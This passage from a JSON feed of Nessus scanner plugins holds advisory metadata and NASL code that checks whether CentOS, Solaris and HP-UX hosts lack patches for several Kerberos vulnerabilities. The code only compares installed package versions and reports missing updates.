servers to authenticate to each other through use of symmetric encryption and a trusted third party, the KDC.\n\nA flaw was found where some bundled Kerberos-aware applications would fail to check the result of the setuid() call. On Linux 2.6 kernels, the setuid() call can fail if certain user limits are hit. A local attacker could manipulate their environment in such a way to get the applications to continue to run as root, potentially leading to an escalation of privileges. (CVE-2006-3083).\n\nUsers are advised to update to these erratum packages which contain a backported fix to correct this issue.", "cvss3": {}, "published": "2006-08-10T00:00:00", "type": "nessus", "title": "CentOS 4 : krb5 (CESA-2006:0612)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3083"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:krb5-devel", "p-cpe:/a:centos:centos:krb5-libs", "p-cpe:/a:centos:centos:krb5-server", "p-cpe:/a:centos:centos:krb5-workstation", "cpe:/o:centos:centos:4"], "id": "CENTOS_RHSA-2006-0612.NASL", "href": "https://www.tenable.com/plugins/nessus/22197", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2006:0612 and \n# CentOS Errata and Security Advisory 2006:0612 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22197);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2006-3083\");\n script_bugtraq_id(19427);\n script_xref(name:\"RHSA\", value:\"2006:0612\");\n\n script_name(english:\"CentOS 4 : krb5 (CESA-2006:0612)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated krb5 packages are now available for Red Hat Enterprise Linux 4\nto correct a privilege escalation security flaw.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nKerberos is a network authentication system which allows clients and\nservers to authenticate to each other through use of symmetric\nencryption and a trusted third party, the KDC.\n\nA flaw was found where some bundled Kerberos-aware applications would\nfail to check the result of the setuid() call. On Linux 2.6 kernels,\nthe setuid() call can fail if certain user limits are hit. A local\nattacker could manipulate their environment in such a way to get the\napplications to continue to run as root, potentially leading to an\nescalation of privileges. (CVE-2006-3083).\n\nUsers are advised to update to these erratum packages which contain a\nbackported fix to correct this issue.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-August/013129.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cbbc024b\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-August/013133.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a54c66af\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-August/013134.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b7181ffd\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected krb5 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:krb5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:krb5-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:krb5-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:krb5-workstation\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/08/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 4.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", reference:\"krb5-devel-1.3.4-33\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"krb5-libs-1.3.4-33\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"krb5-server-1.3.4-33\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"krb5-workstation-1.3.4-33\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"krb5-devel / krb5-libs / krb5-server / krb5-workstation\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:16:12", "description": "SunOS 5.8_x86: kpasswd, libgss.so.1 and li.\nDate this patch was last updated by Sun : Aug/10/07", "cvss3": {}, "published": "2005-04-17T00:00:00", "type": "nessus", "title": "Solaris 8 (x86) : 109224-10", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS8_X86_109224.NASL", "href": "https://www.tenable.com/plugins/nessus/18070", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18070);\n script_version(\"1.31\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-0957\");\n\n script_name(english:\"Solaris 8 (x86) : 109224-10\");\n script_summary(english:\"Check for patch 109224-10\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 109224-10\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SunOS 5.8_x86: kpasswd, libgss.so.1 and li.\nDate this patch was last updated by Sun : Aug/10/07\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://download.oracle.com/sunalerts/1017350.1.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"You should install this patch for your system to be up-to-date.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/04/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"109224-10\", obsoleted_by:\"\", package:\"SUNWcstl\", version:\"11.8.0,REV=2000.01.08.18.17\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"109224-10\", obsoleted_by:\"\", package:\"SUNWgss\", version:\"11.8.0,REV=2000.01.08.18.17\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"109224-10\", obsoleted_by:\"\", package:\"SUNWcsu\", version:\"11.8.0,REV=2000.01.08.18.17\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"109224-10\", obsoleted_by:\"\", package:\"SUNWcsl\", version:\"11.8.0,REV=2000.01.08.18.17\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:16:12", "description": "SunOS 5.8: kpasswd, libgss.so.1 and libkad.\nDate this patch was last updated by Sun : Aug/03/07", "cvss3": {}, "published": "2005-04-17T00:00:00", "type": "nessus", "title": "Solaris 8 (sparc) : 109223-10", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS8_109223.NASL", "href": "https://www.tenable.com/plugins/nessus/18068", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18068);\n script_version(\"1.34\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-0957\");\n\n script_name(english:\"Solaris 8 (sparc) : 109223-10\");\n script_summary(english:\"Check for patch 109223-10\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 109223-10\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SunOS 5.8: kpasswd, libgss.so.1 and libkad.\nDate this patch was last updated by Sun : Aug/03/07\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://download.oracle.com/sunalerts/1017350.1.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"You should install this patch for your system to be up-to-date.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/08/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/04/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109223-10\", obsoleted_by:\"\", package:\"SUNWcstlx\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109223-10\", obsoleted_by:\"\", package:\"SUNWgssx\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109223-10\", obsoleted_by:\"\", package:\"SUNWcstl\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109223-10\", obsoleted_by:\"\", package:\"SUNWgss\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109223-10\", obsoleted_by:\"\", package:\"SUNWcsu\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109223-10\", obsoleted_by:\"\", package:\"SUNWcslx\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"109223-10\", obsoleted_by:\"\", package:\"SUNWcsl\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:00:25", "description": "s700_800 11.11 KRB5-Client Version 1.0 cumulative patch : \n\nA potential security vulnerability has been identified on HP-UX running Kerberos. The vulnerability could be exploited by remote authorized users to execute arbitrary code.", "cvss3": {}, "published": "2007-09-25T00:00:00", "type": "nessus", "title": "HP-UX PHSS_36286 : HP-UX running Kerberos, Remote Arbitrary Code Execution (HPSBUX02217 SSRT071337 rev.2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-1216"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_36286.NASL", "href": "https://www.tenable.com/plugins/nessus/26152", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_36286. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(26152);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2007-1216\");\n script_bugtraq_id(23282);\n script_xref(name:\"HP\", value:\"emr_na-c01056923\");\n script_xref(name:\"HP\", value:\"HPSBUX02217\");\n script_xref(name:\"HP\", value:\"SSRT071337\");\n\n script_name(english:\"HP-UX PHSS_36286 : HP-UX running Kerberos, Remote Arbitrary Code Execution (HPSBUX02217 SSRT071337 rev.2)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.11 KRB5-Client Version 1.0 cumulative patch : \n\nA potential security vulnerability has been identified on HP-UX\nrunning Kerberos. The vulnerability could be exploited by remote\nauthorized users to execute arbitrary code.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01056923\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?adb5d4c3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_36286 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/05/08\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2007/05/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/09/25\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/04/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.11\"))\n{\n exit(0, \"The host is not affected since PHSS_36286 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHSS_36286\", \"PHSS_39774\", \"PHSS_41166\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"KRB5-Client.KRB5-64SLIB\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"KRB5-Client.KRB5-ENG-A-MAN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"KRB5-Client.KRB5-JPN-E-MAN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"KRB5-Client.KRB5-JPN-S-MAN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"KRB5-Client.KRB5-PRG\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"KRB5-Client.KRB5-RUN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"KRB5-Client.KRB5-SHLIB\", version:\"B.11.11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:00:28", "description": "s700_800 11.23 KRB5-Client Version 1.0 Cumulative patch : \n\nA potential security vulnerability has been identified on HP-UX running Kerberos. The vulnerability could be exploited by remote authorized users to execute arbitrary code.", "cvss3": {}, "published": "2007-09-25T00:00:00", "type": "nessus", "title": "HP-UX PHSS_34991 : HP-UX running Kerberos, Remote Arbitrary Code Execution (HPSBUX02217 SSRT071337 rev.2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-1216"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_34991.NASL", "href": "https://www.tenable.com/plugins/nessus/26144", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_34991. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(26144);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2007-1216\");\n script_bugtraq_id(23282);\n script_xref(name:\"HP\", value:\"emr_na-c01056923\");\n script_xref(name:\"HP\", value:\"HPSBUX02217\");\n script_xref(name:\"HP\", value:\"SSRT071337\");\n\n script_name(english:\"HP-UX PHSS_34991 : HP-UX running Kerberos, Remote Arbitrary Code Execution (HPSBUX02217 SSRT071337 rev.2)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.23 KRB5-Client Version 1.0 Cumulative patch : \n\nA potential security vulnerability has been identified on HP-UX\nrunning Kerberos. The vulnerability could be exploited by remote\nauthorized users to execute arbitrary code.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01056923\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?adb5d4c3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_34991 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/05/08\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2007/05/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/09/25\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/04/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.23\"))\n{\n exit(0, \"The host is not affected since PHSS_34991 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHSS_34991\", \"PHSS_39765\", \"PHSS_41167\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"KRB5-Client.KRB5-64SLIB\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"KRB5-Client.KRB5-ENG-A-MAN\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"KRB5-Client.KRB5-IA32SLIB\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"KRB5-Client.KRB5-IA64SLIB\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"KRB5-Client.KRB5-JPN-E-MAN\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"KRB5-Client.KRB5-JPN-S-MAN\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"KRB5-Client.KRB5-PRG\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"KRB5-Client.KRB5-RUN\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"KRB5-Client.KRB5-SHLIB\", version:\"B.11.23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:00:29", "description": "s700_800 11.31 KRB5-Client Version 1.3.5.03 Cumulative patch : \n\nA potential security vulnerability has been identified on HP-UX running Kerberos. The vulnerability could be exploited by remote authorized users to execute arbitrary code.", "cvss3": {}, "published": "2007-09-25T00:00:00", "type": "nessus", "title": "HP-UX PHSS_36361 : HP-UX running Kerberos, Remote Arbitrary Code Execution (HPSBUX02217 SSRT071337 rev.2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-1216"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_36361.NASL", "href": "https://www.tenable.com/plugins/nessus/26153", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_36361. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(26153);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2007-1216\");\n script_bugtraq_id(23282);\n script_xref(name:\"HP\", value:\"emr_na-c01056923\");\n script_xref(name:\"HP\", value:\"HPSBUX02217\");\n script_xref(name:\"HP\", value:\"SSRT071337\");\n\n script_name(english:\"HP-UX PHSS_36361 : HP-UX running Kerberos, Remote Arbitrary Code Execution (HPSBUX02217 SSRT071337 rev.2)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.31 KRB5-Client Version 1.3.5.03 Cumulative patch : \n\nA potential security vulnerability has been identified on HP-UX\nrunning Kerberos. The vulnerability could be exploited by remote\nauthorized users to execute arbitrary code.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01056923\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?adb5d4c3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_36361 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/05/07\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2007/05/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/09/25\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/04/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.31\"))\n{\n exit(0, \"The host is not affected since PHSS_36361 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHSS_36361\", \"PHSS_37666\", \"PHSS_38568\", \"PHSS_39766\", \"PHSS_40655\", \"PHSS_41168\", \"PHSS_41775\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"KRB5-Client.KRB5-64SLIB\", version:\"B.11.31\")) flag++;\nif (hpux_check_patch(app:\"KRB5-Client.KRB5-ENG-A-MAN\", version:\"B.11.31\")) flag++;\nif (hpux_check_patch(app:\"KRB5-Client.KRB5-IA32SLIB\", version:\"B.11.31\")) 